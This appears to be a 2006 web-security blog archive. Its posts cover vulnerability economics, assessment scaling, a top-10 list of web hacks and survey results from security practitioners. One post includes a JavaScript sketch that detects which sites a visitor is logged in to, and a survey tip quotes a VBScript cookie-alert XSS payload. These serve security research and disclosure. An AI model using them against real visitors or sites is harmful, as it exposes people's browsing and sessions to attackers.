Thursday, December 28, 2006

Applying the formula

Sylvan von Stuppe published a pair of excellent posts speaking about how we as security practitioners can motivate "the business" to improve the current state of web application security. Sylvan adds to my earlier list of questions with something very insightful.

"Once flaws have been identified, what is my motivation to fix them? If you can't give me the likelihood of attack, and what I stand to lose by it being exploited, how many dollars should I invest to repairing it?"

As security practitioners, we continue to say how much the development environments need to learn to make secure software. I'd say there's another side to that coin - security practitioners need to be able to measure the impact of particular threats in terms of dollars so that we don't just reveal vulnerabilities and the threats that might exploit them, but what the business stands to lose if the vulnerability isn't fixed.

Very well stated, and it got me thinking about how this could be done. For some reason the movie Fight Club popped into my head, specifically the scene where Jack, as an automotive manufacturer's recall coordinator, applies "the formula". Seemed like a fun way to go about it. :)

JACK (V.O.)
I'm a recall coordinator. My job is to apply the formula.

....

JACK (V.O.)

Take the number of vehicles in the field, (A), and multiply it by the probable rate of failure, (B), then multiply the result by the average out-of-court settlement, (C). A times B times C equals X...

JACK
If X is less than the cost of a recall, we don't do one.

BUSINESS WOMAN

Are there a lot of these kinds of accidents?


JACK

Oh, you wouldn't believe.


BUSINESS WOMAN

... Which... car company do you work for?


JACK

A major one.


I know I know, I broke the first rule of Fight Club. Anyway, I have no idea how "real" this formula is or if it's actually applied, but it seemed to make sense. I wondered if something similar could be applied to web application security. If nothing else, it's an entertaining exercise.

Take the number of known vulnerabilities in a website, (A), and multiply it by the probability of malicious exploitation, (B), then multiply the result by the average financial cost of handling a security incident, (C). A times B times C equals X...

If X is less than the cost of fixing the vulnerabilities, we won't.
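To make the exercise concrete, here's a minimal sketch of the calculation in JavaScript. Every input number below is a placeholder I made up for illustration; filling them in accurately is exactly the hard part discussed next.

// "The formula" applied to a single website. All values are made-up placeholders.
var knownVulns = 10; // (A) known vulnerabilities in the website
var pExploit = 0.05; // (B) probability of malicious exploitation
var incidentCost = 200000; // (C) average cost of handling a security incident (US$)
var fixCost = 50000; // cost of fixing the vulnerabilities (US$)

var X = knownVulns * pExploit * incidentCost; // A times B times C equals 100,000

// If X is less than the cost of fixing the vulnerabilities, the business won't fix them.
alert(X < fixCost ? "Don't fix" : "Fix"); // "Fix" in this example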

Sounds like it could work, provided you could be somewhat accurate in filling in the variables, which is the hard part. The thing is, this process probably isn't a suitable task for an information security person. Maybe we need to seek the assistance of an economist or a probability theorist and see what they have to say.

moving forward: the knowns and unknowns

We know the security of websites must improve, heck it can’t get much worse. One major challenge we’re facing is that not everyone agrees on what needs to be done. For example, if someone were to ask a mailing list, “what do I need to do to secure my website?”, they’d likely receive 20 different answers and perhaps get asked just as many questions. Conversely, if the same question was asked about a PC, you’d probably get 3 similar answers and maybe a question about why you’re using Windows (*just kidding*). This inevitably leaves website owners in a state of confusion, unsure of what to do. Maybe they’ll do nothing.

I think the reason behind the lack of consensus is a void of data and/or a means to measure success. We’re essentially flying blind. Let’s rhetorically consider several questions people commonly ask:

“How do I find out how many websites I have?”
“What do they do and how *important* are they?”
“Who’s responsible for them?”

Digging into a single website….

“How large and complex is the code base?”
“What’s the rate of application code change?”

Narrowing down to vulnerabilities…

“What vulnerabilities do I have?”
“Whose fault is it and how do I prioritize their remediation?”
“What do I do to protect myself in the meantime?”

Finally organizational changes…

“Which should I focus on, developer education or the use of a modern development framework?”
“Which testing process is better, white box or black box or glass box?”

Answering these questions is anything but simple. The answers depend on any number of factors, are unknown to any single person, and vary from organization to organization. The point is an organization must be able to understand its current state of affairs. And we as an industry must be able to measure whether a particular strategy or solution is working and, if so, how well. This brings us to where I think we are today: best-practices based upon conventional wisdom held over from other areas of information security, which do not apply here. A harsh reality.

To begin looking at things from a fresh perspective, I find it’s helpful to line up the "knowns" and "unknowns" for a particular problem set. From there it’s easier to spot trends, relationships, inconsistencies, and areas that should yield immediate return from investigation.
  1. Among what would normally be considered the largest, most popular, and most “secure” websites, the vast majority are found to have serious vulnerabilities. We have no idea about the security of the mid- and lower-end websites, which are typically not assessed.
  2. Those typically in charge of information security do not have the same level of control over the safety of their websites as they do at the network infrastructure level. Consequently, the responsibility for website security is either unassigned or rests among several constituencies.
  3. Attacks targeting the web application layer are growing year over year in number, sophistication, and maliciousness. Real-world visibility into these attacks is extremely limited.
  4. Firewalls, patching, configuration, transmission/database encryption, and strong authentication solutions do not protect against the majority of web application vulnerabilities.
  5. All software has defects and in turn will have vulnerabilities. Security enhancements provided by modern development frameworks help to prevent vulnerabilities, though they will not eliminate them altogether. The measured benefit is unknown.
  6. Commerce web applications change relatively rapidly, updated with incremental revisions. Traditional PC or enterprise software tends to change more slowly, with larger versioned builds. Web applications tend to have a steady and faster flow of vulnerabilities.
  7. Developer education in software security and implementing security testing inside the quality assurance phase reduce the number of vulnerabilities, but will not eliminate them. See #5. The overall expected reduction of vulnerabilities as a result is unknown.
  8. It’s impossible to find all vulnerabilities through automation; thorough security testing requires a significant amount of experienced human time. How much time is required and how close the process will come to finding everything is debatable.
  9. Web application security is a new and complex subject for which there is a limited population of experienced practitioners relative to the amount of workload.
  10. Web browser security is largely and fundamentally broken, leaving it unable to protect users against modern attacks. The situation hasn’t significantly improved with Firefox 2.0 or Internet Explorer 7.0, and it’s unclear if future releases will attempt to address the problem.
What does this tell us? A lot of things actually. First and foremost, there is a lot of work to do *like we didn’t know that already*. Here are a couple of my observations:
  • Solutions must come from areas other than "fixing" the code
  • We need to invest resources into measuring ROI from various solutions and best-practices
  • Create training and perhaps certification programs for web application security professionals
  • We need wider visibility into the real-world hacks
  • We need to develop and implement new and innovative security designs for modern web browsers
I’d enjoy hearing from others about additional “knowns” and “unknowns” and what they can derive from them.

Tuesday, December 26, 2006

The future of web application vulnerability assessment is about scale

Recently Alan Shimel (StillSecure) went out on a tiny twig and said, “vulnerability assessment (VA) is dead”. Of course Alan’s speaking about network security, not web applications. His remarks are about VA's convergence with NAC. Fair enough. When I spoke with him he said, “Actually VA for web apps is one of the few bright spots in the VA space these days.” I'd like to think so. :) This topic is always on my mind since this is exactly what my company does. “What is the future of web application vulnerability assessment?” is a question that doesn’t get asked a lot. Personally I think we’re at the point where network VA was a few years ago, solving the challenge of scaling.

Where are we now?
  • 105 million sites are on the Web with 4 million new ones each month.
  • Perhaps hundreds (?) of thousands of websites collect or distribute personal information, financial and healthcare data, credit card numbers, intellectual property, trade secrets, etc.
  • Web application issues top every major Top-X vulnerability list.
  • 8 out of 10 websites are full of holes and most of the attacks are targeting the web application layer.
  • Assessments should be performed after each code change or "major" release and require about a week or two of human-time to complete.
We need to get our arms around the problem.

Analyzing the scope using some assumptions:
  • 500,000 “important” websites (roughly 1/2 of 1% of the total population)
  • Assessments 2-times a year per website. (Varies with change rate)
  • An expert can perform 40 assessments per year with base salary of $100,000 (US).
  • Retail cost per assessment $5,000 (US). (Normally higher, ranging between $8,000 and $15,000)
Granted my numbers could be off and may vary a great deal from enterprise to enterprise. However, this exercise helps estimate the relative needs of the market. Let's see what kind of resources we need if we're trying to assess all these websites for vulnerabilities twice per year.

Today we'd need:
  • 1 million total vulnerability assessments
  • 25,000 experienced experts in web application VA
  • $2,500,000,000 (US) in salary for web application experts
  • $5,000,000,000 (US) retail assessment cost
Even though the assumptions were way on the conservative side, it’s immediately apparent that this scenario is completely fictitious. There are probably only 3,000 experts (a guess) in the world qualified to perform assessments, relative to the 25,000 required. And much as I’d wish they would, enterprises are simply not going to spend multi-billions on web application security in 2007.

Of course as the awareness of web application security builds the numbers will climb, but for now we have to face facts. And the fact is unless we can vastly improve the web application VA process, most websites will not be assessed for security and remain insecure. That’s what’s going on today. And that’s why I’m saying the future of web application vulnerability assessment is about scale.

While we certainly can’t reduce the number of “important” websites, we can reduce the number of man-hours and expertise required to perform an assessment using technology and modern processes. Modern assessment processes need to be highly streamlined, repeatable, able to run thousands of assessments concurrently, and performable by less than top-tier webappsec experts. This is what it truly means to “scale”.

How much improvement can be made in the near term is a subject of much debate, but we’re working on it. For fun, let’s try a few more guesses at how certain efficiencies will help.

Future improvements:
  • 500,000 “important” websites (roughly 1/2 of 1% of the total population)
  • Assessments 2-times a year per website. (Varies with change rate)
  • An expert can perform 200 assessments per year (up from 40) with a base salary of $80,000 (US) (down from $100,000).
  • Retail cost per assessment $2,000 (US) (down from $5,000).
Adjusted requirements:
  • 1 million total vulnerability assessments
  • 5,000 experienced experts in web application VA
  • $400,000,000 (US) in salary for web application experts
  • $2,000,000,000 (US) retail assessment cost
These numbers are much more palatable in the grand scheme of things and give us benchmarks for where technology and process must take us. How long it will take to get there is anyone's guess.
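For anyone who wants to plug in their own assumptions, here's a quick back-of-the-envelope sketch of the arithmetic behind both sets of numbers. The function and variable names are mine, purely for illustration.

// Estimate industry-wide web application VA workload and cost from a few assumptions.
function estimateVA(sites, assessmentsPerSite, assessmentsPerExpert, salary, retailPrice) {
  var assessments = sites * assessmentsPerSite; // total assessments per year
  var experts = Math.ceil(assessments / assessmentsPerExpert); // experts required
  return {
    assessments: assessments,
    experts: experts,
    salaryCost: experts * salary, // total expert salary (US$)
    retailCost: assessments * retailPrice // total retail assessment cost (US$)
  };
}

// Today: 40 assessments per expert, $100,000 salary, $5,000 per assessment
estimateVA(500000, 2, 40, 100000, 5000);
// -> 1,000,000 assessments, 25,000 experts, $2.5B salary, $5B retail

// Future: 200 assessments per expert, $80,000 salary, $2,000 per assessment
estimateVA(500000, 2, 200, 80000, 2000);
// -> 1,000,000 assessments, 5,000 experts, $400M salary, $2B retail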

Friday, December 22, 2006

Secure Code Through Frameworks

pdp (architect) recently invited me to guest blog on gnucitizen. I'd never done something like that before, so I figured it'd be a fun first. Here goes...

Secure Code Through Frameworks
105 million sites make their home on the Web - 4 million more move in each month. That’s a staggering number to think about, and as we well know, the vast majority of websites (I say 8 in 10) have serious security issues. Industry discussions go round and round about what should be done. We talk about secure coding practices, training, compliance, assessment, source-code audits, and the like. What’s going to work? Then I read something Robert Auger posted, arguing that the lack of security-enabled frameworks is why we’re vulnerable, which touches on an area I’ve thought a lot about recently.


Friday, December 15, 2006

Top 10 Web Hacks of 2006

Update: RSnake provides his summary of the Top 10. Insightful as usual.

Attacks always get better, never worse. That’s probably what I’ll remember most about 2006. What a year it’s been in web hacking! There’s never been such a big leap forward in the industry and frankly it’s really hard to keep up. My favorite quote came today from Kryan:

"The last quarter of this year, RSnake and Jeremiah pretty much destroyed any security we thought we had left. Including the "I'll just browse without javascript" mantra. Could you really call that browsing anyways?"

To look back on what’s been discovered, RSnake, Robert Auger, and I collected as many of the new 2006 web hacks as we could find. We’re using the term "hacks" loosely to describe some of the more creative, useful, and interesting techniques/discoveries/compromises. There were about 60 to choose from, making the selection process REALLY difficult. After much email deliberation we believe we created a solid Top 10. Below you’ll find the entire list in no particular order. Enjoy!


Top 10

  1. Web Browser Intranet Hacking / Port Scanning - (with JavaScript and with HTML-only and the improved model)
  2. Internet Explorer 7 "mhtml:" Redirection Information Disclosure
  3. Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
  4. Web Browser History Stealing - (with CSS, evil marketing, JS login-detection, and authenticated images)
  5. Backdooring Media Files (QuickTime, Flash, PDF, Images, Word [2], and MP3's)
  6. Forging HTTP request headers with Flash
  7. Exponential XSS
  8. Encoding Filter Bypass (UTF-7, Variable Width, US-ASCII)
  9. Web Worms - (AdultSpace, MySpace, Xanga)
  10. Hacking RSS Feeds

Honorable Mention

Full List
The Attack of the TINY URLs
Backdooring MP3 Files
Backdooring QuickTime Movies
CSS history hacking with evil marketing
I know where you've been
Stealing Search Engine Queries with JavaScript
Hacking RSS Feeds
MX Injection : Capturing and Exploiting Hidden Mail Servers
Blind web server fingerprinting
JavaScript Port Scanning
CSRF with MS Word
Backdooring PDF Files
Exponential XSS Attacks
Malformed URL in Image Tag Fingerprints Internet Explorer
JavaScript Portscanning and bypassing HTTP Auth
Bruteforcing HTTP Auth in Firefox with JavaScript
Bypassing Mozilla Port Blocking
How to defeat digg.com
A story that diggs itself
Expect Header Injection Via Flash
Forging HTTP request headers with Flash
Cross Domain Leakage With Image Size
Enumerating Through User Accounts
Widespread XSS for Google Search Appliance
Detecting States of Authentication With Protected Images
XSS Fragmentation Attacks
Poking new holes with Flash Crossdomain Policy Files
Google Indexes XSS
XML Intranet Port Scanning
IMAP Vulnerable to XSS
Detecting Privoxy Users and Circumventing It
Using CSS to De-Anonymize
Response Splitting Filter Evasion
CSS History Stealing Acts As Cookie
Detecting FireFox Extentions
Stealing User Information Via Automatic Form Filling
Circumventing DNS Pinning for XSS
Netflix.com XSRF vuln
Browser Port Scanning without JavaScript
Bypassing Filters With Encoding
Variable Width Encoding
Network Scanning with HTTP without JavaScript
AT&T Hack Highlights Web Site Vulnerabilities
How to get linked from Slashdot
F5 and Acunetix XSS disclosure
Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
Google plugs phishing hole
Nikon magazine hit with security breach
Governator Hack
Metaverse breached: Second Life customer database hacked
HostGator: cPanel Security Hole Exploited in Mass Hack
I know what you've got (Firefox Extensions)
ABC News (AU) XSS linking the reporter to Al Qaeda
Account Hijackings Force LiveJournal Changes
Xanga Hit By Script Worm
Advanced Web Attack Techniques using GMail
PayPal Security Flaw allows Identity Theft
Internet Explorer 7 "mhtml:" Redirection Information Disclosure
Bypassing of web filters by using ASCII
Selecting Encoding Methods For XSS Filter Evasion
Adultspace XSS Worm
Anonymizing RFI Attacks Through Google
Google Hacks On Your Behalf
Google Dorks Strike Again

Thursday, December 14, 2006

I know if you're logged-in, anywhere

Update: Chris Shiflett posted a "login-check" for Amazon.

The CSS History hack is a well-known brute force way to uncover where a victim user has traveled. Great Firefox extensions like SafeHistory are helping protect against this simple hack, but the cat and mouse game continues. Despite this tool, I’ve found a new way to tell where the user has been AND also if they are “logged-in”. People are frequently and persistently logged-in to popular websites. Knowing which websites a user is logged in to can also be extremely helpful in improving the success rate of CSRF or Exponential XSS attacks, as well as other nefarious information-gathering activities.

The technique uses a similar method to JavaScript Port Scanning by matching errors from the JavaScript console. Many websites requiring login have URLs that return different HTML content depending on whether you're logged-in or not. For instance, the “Account Manager” web page can only be accessed if you’re properly authenticated. If these URLs are dynamically loaded into a <* script src=””> tag, they will cause the JS Console to error differently because the response is HTML, not JS. The type of error and line number can be pattern-matched.

Using Gmail as an example, <* script src=”http://mail.google.com/mail/”>

If you are logged-in…




If you are NOT logged-in…



I mapped the error messages from a few popular websites and made some PoC code.
Firefox Only! (1.5 – 2.0) tested on OS X and WinXP. I don’t want to hear it about IE and Opera. :)
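For the curious, here's a rough sketch of how the error matching might look. This is my own illustration, not the linked PoC, and the fingerprinted line number (42) is made up; the real values differ per site and per login state, and this only works where window.onerror can observe the cross-domain parse error (Firefox 1.5/2.0-era behavior).

// Hedged sketch: detect login state by fingerprinting the JS console error a
// cross-domain HTML page raises when loaded via a script tag.
function checkLoginState(url, loggedInErrorLine, callback) {
  window.onerror = function (message, source, line) {
    callback(line === loggedInErrorLine); // compare against the known fingerprint
    return true; // suppress the console error
  };
  var s = document.createElement("script");
  s.src = url; // the response is HTML, not JS, so it always errors (by design)
  document.getElementsByTagName("head")[0].appendChild(s);
}

// Hypothetical usage against Gmail (the line number 42 is invented):
checkLoginState("http://mail.google.com/mail/", 42, function (loggedIn) {
  alert(loggedIn ? "Logged-in to Gmail" : "Not logged-in");
});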

See the Proof-of-Concept
thanks to RSnake for hosting

Wednesday, December 13, 2006

Looking back at my predictions for 2006

First, let's look at how I did for 2006.

Research in 2006
1) I think there is going to be a lot of research, on the white hat and black hat side, in the area of web-based worms. Lots of creating and trading of JavaScript exploit code once an XSS issue is found.

Right on the money. Of course this might have been a self-fulfilling prophecy. :) Those are the best kind.

Commercial landscape in 2006
Personally I think compliance, specifically PCI, is going to be a big driver to improve web application security.

Blech, way off. PCI is a good standard with decent web application security components, but the enforcement of validation of compliance leaves something to be desired. When network scanning vendors can meet the minimum webappsec criteria with only the most rudimentary checks, then clearly there is improvement required. Checkbox != security. Maybe PCI will be a real driver by 2008. Time will tell.

To meet the requirements, I expect vendors will combine various types of vulnerability assessment products through innovation or acquisition. Current product/service offerings separate network, cgi, and web application assessment layers. Some combine 2, but not all three.


Off yet again. I still think this will happen, just don't know exactly when. I thought it would have taken place already.

To pass PCI quickly, we'll see people looking for simple solutions or hacks to clean up their vulnerabilities. Not everyone has the resources available to fix their web app code the right way. As a result, I expect new web server add-ons (or WAF's) and configuration set-ups will be employed as band-aids to prevent the identification of vulnerabilities. This will create an interesting challenge for the industry.

Let's call this a 50/50. I was correct about a huge increase in web application firewall deployments in the market, led by ModSecurity and other commercial players. Way more WAF's on the Web than there were in 2004 and 2005. However, this didn't have anything to do with meeting PCI or a band-aid approach as I guessed. Most deployments I've seen have been towards defense-in-depth, bravo, but I was wrong in the prediction. :)

Then a few other predictions:
* a variety of different product/service standards

Nope. Wrong.

* certifications for web application security professionals

Wrong again!

* other industries begin implementing PCI-like security standards

Sheesh, way off.

I'm no Nostradamus, that's for sure.

Friday, December 08, 2006

Business Logic Flaws and Yahoo Games

Compelling real-world examples of business logic flaws in web applications are hard to come by. Most of the time we can't talk about specific instances because they’re typically unique to a company and protected under NDA. So when I read the editor's article in CSO magazine (A Nation of Cheaters?) describing his experience with a logic flaw in the Yahoo Games ladders, I was immediately interested. Specifically because Yahoo was my previous employer and I was personally involved with the situation described.

"A few years back, Yahoo Games instituted an online chess ladder. A ladder system essentially ranks all the players from top to bottom, and you move up by beating people ranked higher on the ladder. Losing (or not playing) slowly lowers your ranking.

I'm a decent player—I won the state championship of Kentucky in my salad days—but couldn't begin to approach the top of Yahoo's ladder. But guess what? The people at the top weren't playing chess at all!

They were cheaters, a closed circle of players passing the crown around by systematically losing one-move games to each other. Player No. 2 challenges Player No. 1, makes one move to start the game, and then Player No. 1 resigns the game and they switch rankings on the ladder. "

This is what we call Abuse of Functionality, "an attack technique that uses a web site's own features and functionality to consume, defraud, or circumvent access control mechanisms." Most of the time we can't find these issues by scanning; we have to find them by hand, or hear about them from customer support when they receive hundreds of calls from pissed-off users who can't improve their chess rank. There is more to this hack.

There are literally thousands of people (or more) with an amazing amount of free time to do the most mundane tasks for the most inane rewards. “Cheating” players would code purpose-built programs to bot hundreds of chess games simultaneously, 24x7. They’d sit up late into the evening because every so often the ladder ranks would be reset, and when they were, they’d snatch the top spots. And once they owned a block of the top spots they’d only play within their controlled accounts to rise slowly in rank. The way the ladder logic worked, “legit” ranked players had to play against other equally or higher-ranked players, and since cheaters wouldn’t play against them, legit players would drop in rank.

All that just to be at the top of the Yahoo Chess games ladder. No monetary reward, no praise, no nothing. Makes you think where else this is going on doesn’t it?

Thursday, December 07, 2006

Ryan Barnett enters the Blogosphere

Ryan Barnett, author of Preventing Web Attacks with Apache, is Breach Security's new Director of Application Security Training. If you recall, Breach acquired ModSecurity earlier this year and is a WAF product vendor. Ryan, a long time friend, is a master of web application defensive strategies and techniques. In a real-world sense, he knows what it takes to keep a website from getting hacked. He's finally entered the blogging realm and it'll be interesting to see what he has to say over 2007.

Wednesday, December 06, 2006

Web Application Security Professionals Survey (Dec. 2006)

Update 2: It looks like our little survey here is reaching some critical mass. Kelly Jackson Higgins from Dark Reading posted 'Not Much Resistance at the Door' covering the results. In the article, one of the areas we haven't asked questions about came up: intranets:

"The scary unknown is intranet Website vulnerability, however, which the survey did not address. "There are no good metrics for how many intranet Websites there are, or how vulnerable they are. That's a big unknown in the industry," Grossman says. "It's a whole other world inside the firewall."

Update
: Once again a great survey turnout. A total of 63 respondents. Thank you to everyone who responded and to those who helped me out with the questions. We didn't reach my 100 prediction, but that's OK because I'm not very good at those anyway. :) We'll try to get there in January. The problem is it's getting difficult to manage this by email; I'll have to figure out some way to remedy that. The data collected certainly did not disappoint and some interesting things bubbled to the top.

My Observations
Good representation from both security vendors and enterprise professionals. Most have several years of experience, dedicate a significant percentage of their time to web application security, and performed 1 - 40 assessments in 2006. An experienced bunch I’d say.

About half of the organizations that have vulnerability assessments performed see security measurement as the primary driver, and about a quarter say compliance. I would have figured measurement would have scored higher and compliance lower. Maybe we’re seeing a shift in the industry.

The vast majority of webappsec professionals believe assessments should be performed after each code change or "major" release, say an assessment takes a week or two to complete, and rarely encounter multi-factor authentication or web application firewalls. About half of the people using commercial scanners say scanners complete about half or less of their workload. The other half, who don’t use them, say assessments are faster to do by hand, the scanners have too many false positives, or they’re too expensive. There is much more to talk about here, but that’ll come in another post.

Question 12a on disclosure yielded some interesting results. The majority of people are evenly split between “responsible” and “non” disclosure. Think about that. Just as many are disclosing as those who don’t because of the inherent risk. As I’ve said before, discovery is going to be a big issue moving forward. We’re going to lose the check and balance we’ve relied upon with traditional commercial and open source software.

Description
It's been a month already since the last survey. In November we got a great turnout, doubling the response from October. Maybe this time we'll reach 100 respondents. Anyway...

If you perform web application vulnerability assessments, whether personally or professionally, this survey is for you. 15 multiple choice questions designed to help us understand more about the industry in which we work. Most of us in InfoSec dislike taking surveys; however, the more people who respond, the more informative the data will be. So far the information collected has been really popular and insightful. And a lot of people helped out with the formation of these questions.

================================================================
Guidelines
  • Open to those who perform web application vulnerability assessments/pen-tests
  • Email your answers to jeremiah __at__ whitehatsec.com
  • To curb fake submissions please use your real name, preferably from your employer's domain.
  • Submissions must be received by December 14.
Notice: Results based on data collected will be published.

Privacy: Absolutely no names or contact information will be released to anyone. Though feel free to self publish your answers (blogs).
================================================================

Questions

1) What type of organization do you work for?

a) Security vendor / consultant (63%)

b) Enterprise (23%)
e) Other (please specify) (10%)
c) Government (5%)
d) Educational institution (0%)




2) What portion of your job is dedicated to web application security (as opposed to development, general security, incident response, etc)?



a) All or almost all (53%)
b) About half (28%)
c) Some (20%)
d) None (0%)




3) How many years have you been working in the web application security field?


c) 2 - 4 (33%)
e) 6+ (25%)
d) 4 - 6 (20%)
b) 1 - 2 (13%)
a) Less than a year (10%)




4) In your experience, what's the primary reason why organizations have web application vulnerability assessments performed?


a) To measure how secure they are, or not (53%)
b) Industry regulation and/or compliance (25%)
c) Customers or partners ask for independent third-party validation (10%)
e) Other (please specify) (10%)
d) No idea (3%)




5) How often should web applications be assessed for vulnerabilities?


a) After every code change (65%)
e) Other (please specify) (20%) - Answers mostly revolved around "major" releases.
c) Quarterly (10%)
b) Annually (5%)
d) Before the auditors arrive (0%)




6) How many web application vulnerability assessments have you personally conducted this year (2006)?


b) 1 - 20 (50%)
c) 20 - 40 (23%)
d) 40 - 60 (13%)
e) 60+ (10%)
a) None (5%)




7) How many man-hours does it take you to complete a web application vulnerability assessment on the average website?


c) 20 - 40 (50%)
b) 0 - 20 (23%)
d) 60 - 80 (23%)
e) 80+ (5%)
a) None (0%)




Please ONLY answer ONE of the two following questions (#8 and #9)

Commercial Vulnerability Scanners: (Acunetix, Cenzic, Fortify, NTOBJECTives, Ounce Labs, Secure Software, SPI Dynamic, Watchfire, etc.)

8) If commercial vulnerability scanners ARE part of your tool chest, how much of your preferred assessment methodology do they complete? 36 respondents (57%)

c) About half (58%)
d) A little bit (33%)
e) Not much (4%)
b) Most of it (4%)
a) All or almost all (0%)




9) If commercial vulnerability scanners are NOT part of your tool chest, why not?
27 respondents (43%)

d) Some combination of a, b, and c (61%)
a) Too many false positives (11%)
c) Faster to do assessments by hand (11%)
b) Too expensive (6%)
e) Haven't tried any of them (6%)
f) Other (please specify) (6%)




10) How often do you encounter web application firewalls blocking your attacks during a vulnerability assessment?


d) Never, or almost never (73%)
c) Sometimes (10%)
e) Hard to tell (10%)
b) About half of the time (5%)
a) A lot (3%)





11) While performing web application vulnerability assessment, how often do you encounter websites requiring multi-factor authentication?
(Hardware token, software token, secret questions, one-time passwords, etc.)


d) Never, or almost never (50%)
c) Sometimes (35%)
b) About half of the time (8%)
a) A lot (5%)
e) Hard to tell (3%)



12a) If you find a vulnerability in a website you don't have written permission to test, what do you do with the data MOST of the time?


b) Inform the website administrators (responsible disclosure) (36%)
c) Keep it to yourself, no sense risking jail or lawsuits (36%)
e) Other (please specify) (18%)
a) Post it to sla.ckers.org (full-disclosure) (8%)
d) Sell it (3%)

Daniel Cuthbert: "WALK AWAY! spending 1 year fighting the british government over this exact thing made me realise this lone cowboy approach will never work :0)"


12b) How has the security of the average website changed this year (2006) vs. last year (2005)?


c) Same (50%)
b) Slightly more secure (28%)
d) Worse (20%)
a) Way more secure (3%)
e) No idea (0%)





13) What do you think of RSnake's XSS cheat sheet?

http://ha.ckers.org/xss.html


b) I like it (55%)
a) It rocks! (28%)
c) It has the basics, but there are more options (13%)
e) Never heard of it (5%)
d) Lame (0%)




14) Do you surf the Web with JavaScript turned off?



c) No (38%)
b) Sometimes (33%)
a) Yes (18%)
d) Only when clicking on links from Jeremiah (10%)




15) What operating system are you using to answer this question?


a) Windows (68%)
b) OS X (15%)
c) Linux (15%)
d) BSD (3%)
e) Other (please specify) (0%)





BONUS


16) The most valuable web application security tip/trick/idea/concept/hack/etc you learned this year (2006)? List just 1 thing. *Full list will be published*

When forms convert lower case to uppercase, use VBScript to test for XSS
since it is not case sensitive like JavaScript <* script type=text/vbscript>alert(DOCUMENT.COOKIE)<* /script>

When spidering a website use your standard USER AGENT, then crawl it again
Using JavaScript to other than just stealing cookies :-P

The research and disclosure being done on sla.ckers.org and gnucitizen.org.
JavaScript Malware Intranet Hacking

I don't remember.

combination of XSS and XHR. (My next PoC will show you why)

Javascript Scanning

Blind SQL injection in MSSQL and MySQL, complex XSS injection (using the
great http://ha.ckers.org/xss.html)

I can tell you, but then I will have to sign you on an NDA :-)

XSS Shell

XSRF

mhtml: vulnerability - complete read access to the Internet on Internet
Explorer. Scary!

Learned none.

This might not be web app. related until after Vista is released (yeah, right).
I found interesting the concept of how to discover whether Visual Studio binaries have been /GS compiled; Used to mitigate local stack variable overflows.

Sorry, I'm restricted from saying. :/ I guess my best/most valuable tip that I use every time is don't become dependent on any one tip/trick/idea/concept/hack. :)

What cross domain restrictions? The web security model was completely smashed up this year and I don't pretend to claim to be smart enough to fix it. But what we got isn't working the way we thought it did.

I've found some new tools to try out, such as TamperIE, which I picked up from the "Hacking Web Applications Exposed 2nd Edition" book I purchased, and I believe you wrote the foreword. Plus I have to hand it to RSnake, id, maluc and the other people on sla.ckers.org, they just keep coming up with new attack vectors. Their disclosures can be a little frightening. As you said in the foreword, sometimes we just want to bury our head in the sand because we know most of the sites out there have vulnerabilities.

CSRF (Just after I tested a bloody forum too!)

improving my XSS knowledge with the awesome help of ha.ckers.org and sla.ckers.org

Learning more about web services, SOAP, XML, etc.

That demonstrating issues to a vendor/customer is much less effective
than expressing the business liability and risk expressed in $s :-)

Fully understanding AJAX, which is important, even if all I learned was that it wasn't as big a deal as I expected it to be (from a security standpoint it is a much bigger deal from developer and user viewpoints).

There is nothing new under the sun. People still do dumb things.

XSS + Ajax avoids the same-domain security sandbox.

Bypassing filtering mechanisms by UTF-16 encoding URLs even when there's no need to

Using POST content as a query string in most cases won't affect the way the receiving application reacts. Attacks are more portable and easier to demonstrate in link format.

Implications of Flash 9 crossdomain.xml, including flaws in the implementation and severe lack of best practice standards. The floodgates may be open on client-side code with cross-domain privileges (Quicktime, etc.), but it's good to see a misstep at least happening in the right direction.

This is my statement for the web application security year 2006:
Everyone can find a XSS vulnerability but fortunately only a few people can imagine what this really means.

Automating viewstate injection. Maybe I'll release some notes about it.

Nothing can replace experience!

session riding

XSS

Watch out for that stupid UTF-7 encoding.

Search myspace for answers to secret questions :)

Intranet IP scanning really opened up my thinking of what XSS could be used to accomplish.

Sunday, December 03, 2006

Followup: Myth-Busting AJAX (In)-Security

I’ve gotten an overwhelming response to my Myth-Busting AJAX (In)Security article, even a nice slashdotting to go with it. The vast majority of the feedback was positive, some negative, others said “you make a good point, but…”. Though one blog post compared me to Donald Rumsfeld. Now come on, that’s just plain mean! :) Anyway, this subject has been on my mind, and apparently many others’, since Black Hat (USA) 2006. There needed to be another perspective voiced since not everyone agreed. So now people have a more complete set of viewpoints to consider and can make up their own minds. That's the important thing.

Anyway, as RSnake pointed out, it’s been a busy week with a ton of new tricks posted. Maybe someone is going to start combining these into something better. JavaScript Malware continues to evolve.

Thursday, November 30, 2006

Myth-Busting AJAX (In)-Security

In similar fashion to my buffer overflows article, I set my sights on Myth-Busting AJAX (In)-Security.

"The hype surrounding AJAX and security risks is hard to miss. Supposedly, this hot new technology responsible for compelling web-based applications like Gmail and Google Maps harbors a dark secret that opens the door to malicious hackers. Not exactly true. Even the most experienced Web application developers and security experts have a difficult time cutting through the buzzword banter to find the facts. And, the fact is most websites are insecure, but AJAX is not the culprit. Although AJAX does not make websites any less secure, it’s important to understand what does." read more...

Wednesday, November 29, 2006

Do we trust client-side security?

Many respected experts prior to me, including Bruce Schneier, have explained the faults of trusting client-side software. Not trusting the client has been widely accepted for a long time. And in kind I’ve repeated the mantra “never ever ever ever trust the client (or user-supplied content)” many times when it comes to web application security. Then I found myself reading one of RSnake’s posts and something he wrote caused me to think about client-side security in a new way. It occurred to me that maybe we’re wrong. Maybe we already do trust the client, or in our case here the web browser. And maybe we have no choice but to continue doing so.

RSnake:
"I guess we have pretty much completely broken the same domain policies of yesterday. If I can scan your Intranet application from an HTML page without JavaScript or Java or any DHTML content whatsoever I think it’s time to start revisiting the entire DOM security model. That might just be my opinion but come on. What else do we have to do to prove it’s not working?"

He’s right of course. In the past 18 months it seems everything web browser related has been hacked. The same-origin policy, cookie security policy, history protection, the intranet boundary, extension models, flash security, location bar trust, and other sensitive areas have all been exposed. Web security models are completely broken and heck it’s spooky to even click on links these days. If we didn’t/don’t rely on client-side (browser) security, none of these discoveries would have mattered and none of us would have cared. But we do! Why is that?

